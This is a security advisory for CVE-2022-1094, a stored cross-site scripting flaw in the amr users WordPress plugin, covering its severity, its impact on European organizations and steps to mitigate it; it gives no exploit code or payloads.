CVE-2022-1094 is a medium-severity vulnerability classified as CWE-79 (Cross-site Scripting, XSS) affecting the amr users WordPress plugin versions prior to 4.59.4. The vulnerability arises because the plugin fails to properly sanitize and escape certain settings. This flaw allows users with high privileges, such as administrators, to inject and store malicious scripts within the plugin's settings. Notably, this Stored XSS attack vector is exploitable even when the WordPress unfiltered_html capability is disabled, which normally restricts the ability to post unfiltered HTML content. The vulnerability requires high privilege (admin-level) access and user interaction to trigger the malicious script execution, which can lead to the compromise of confidentiality and integrity of the affected WordPress site. The CVSS v3.1 score is 4.8, reflecting a medium severity with network attack vector, low attack complexity, high privileges required, and user interaction needed. The scope is changed, indicating that the vulnerability can affect components beyond the initially vulnerable plugin. No known exploits in the wild have been reported, and no official patch links were provided in the data, but version 4.59.4 is indicated as the fixed version. This vulnerability is particularly relevant for websites using the amr users plugin, which is used for managing user profiles and memberships on WordPress sites. Exploitation could allow an attacker to execute arbitrary JavaScript in the context of the site, potentially leading to session hijacking, privilege escalation, or defacement.

For European organizations, this vulnerability poses a risk primarily to those operating WordPress websites that utilize the amr users plugin. The impact includes potential compromise of site integrity and confidentiality, as malicious scripts could steal session cookies, perform actions on behalf of administrators, or manipulate site content. This could lead to reputational damage, data breaches involving user information, and disruption of services. Given the requirement for high privilege access to exploit, the risk is somewhat mitigated by the need for an attacker to first gain administrative credentials or insider access. However, in environments where multiple administrators or editors exist, the risk of insider threats or compromised admin accounts increases. Additionally, the vulnerability could be leveraged as part of a broader attack chain, such as pivoting to other internal systems or spreading malware. For organizations subject to GDPR and other data protection regulations, exploitation could result in non-compliance penalties if personal data is exposed or mishandled due to the attack.

European organizations should immediately verify the version of the amr users plugin installed on their WordPress sites and upgrade to version 4.59.4 or later, where the vulnerability is addressed. If upgrading is not immediately possible, administrators should restrict access to the WordPress admin dashboard to trusted personnel only and enforce strong authentication mechanisms such as multi-factor authentication (MFA) to reduce the risk of credential compromise. Additionally, organizations should audit existing plugin settings for any suspicious or unexpected content that could indicate attempted exploitation. Implementing a Web Application Firewall (WAF) with rules to detect and block XSS payloads can provide an additional layer of defense. Regular security training for administrators about the risks of stored XSS and safe plugin management practices is recommended. Finally, monitoring logs for unusual administrative activity and conducting periodic vulnerability scans on WordPress installations can help detect and prevent exploitation attempts.